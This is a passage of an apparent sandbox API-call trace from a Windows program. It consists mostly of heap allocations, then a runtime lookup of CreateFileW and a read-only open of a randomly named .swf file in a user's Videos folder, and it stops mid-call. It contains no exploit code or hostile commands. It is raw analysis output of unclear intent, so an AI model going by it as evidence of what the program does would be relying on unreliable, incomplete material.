1 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2390 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0098.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0098.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0098.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0098.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0098.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0098.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0098.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0098.670] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0098.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0098.674] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0098.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.677] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0098.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca640, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0098.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.678] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0098.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0098.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0098.728] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\F0zOuSSpVPNmctC-N.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\f0zousspvpnmctc-n.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0098.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0098.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0098.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) 